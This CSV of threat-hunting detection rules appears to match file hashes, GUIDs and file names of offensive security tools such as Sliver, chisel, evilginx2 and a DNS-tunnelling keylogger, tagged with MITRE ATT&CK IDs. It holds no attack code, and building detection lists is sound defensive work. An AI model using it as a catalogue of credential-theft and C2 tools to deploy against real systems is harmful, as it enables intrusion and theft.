"*1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe*",".{0,1000}1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d*",".{0,1000}1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268*",".{0,1000}1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1fc325f3-c548-43db-a13f-8c460dda8381*",".{0,1000}1fc325f3\-c548\-43db\-a13f\-8c460dda8381.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c*",".{0,1000}1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0*",".{0,1000}1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1FDCAD33-E5D1-4D5F-ACD5-FA6F8661DFE5*",".{0,1000}1FDCAD33\-E5D1\-4D5F\-ACD5\-FA6F8661DFE5.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595*",".{0,1000}1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614*",".{0,1000}1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*",".{0,1000}1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*1mil-AD-passwords.txt*",".{0,1000}1mil\-AD\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*1N3/Sn1per*",".{0,1000}1N3\/Sn1per.{0,1000}","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","7528","1769","2024-04-01T22:52:32Z","2015-09-06T15:47:38Z" "*1N73LL1G3NC3x/Nightmangle*",".{0,1000}1N73LL1G3NC3x\/Nightmangle.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*1njected/CMLoot*",".{0,1000}1njected\/CMLoot.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*1password2john.py*",".{0,1000}1password2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2_lyncbrute.sh*",".{0,1000}2_lyncbrute\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99*",".{0,1000}200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4*",".{0,1000}2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650*",".{0,1000}20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*",".{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964*",".{0,1000}205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a*",".{0,1000}20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037*",".{0,1000}208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7*",".{0,1000}208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a*",".{0,1000}208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*20B3AA84-9CA7-43E5-B0CD-8DBA5091DF92*",".{0,1000}20B3AA84\-9CA7\-43E5\-B0CD\-8DBA5091DF92.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f*",".{0,1000}20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec*",".{0,1000}20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500*",".{0,1000}21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2116E6C5-F609-4CA8-B1A1-E87B7BE770A4*",".{0,1000}2116E6C5\-F609\-4CA8\-B1A1\-E87B7BE770A4.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda*",".{0,1000}211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*211A4598-B46E-4CD3-BA5A-1EC259D4DB5A*",".{0,1000}211A4598\-B46E\-4CD3\-BA5A\-1EC259D4DB5A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc*",".{0,1000}2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25*",".{0,1000}214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2150D252-AA17-45C2-8981-A6DCF7055CA6*",".{0,1000}2150D252\-AA17\-45C2\-8981\-A6DCF7055CA6.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79*",".{0,1000}216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a*",".{0,1000}219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0*",".{0,1000}21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f*",".{0,1000}21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7*",".{0,1000}21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d*",".{0,1000}21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073*",".{0,1000}223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*",".{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61*",".{0,1000}22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3*",".{0,1000}22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f*",".{0,1000}227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45*",".{0,1000}22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 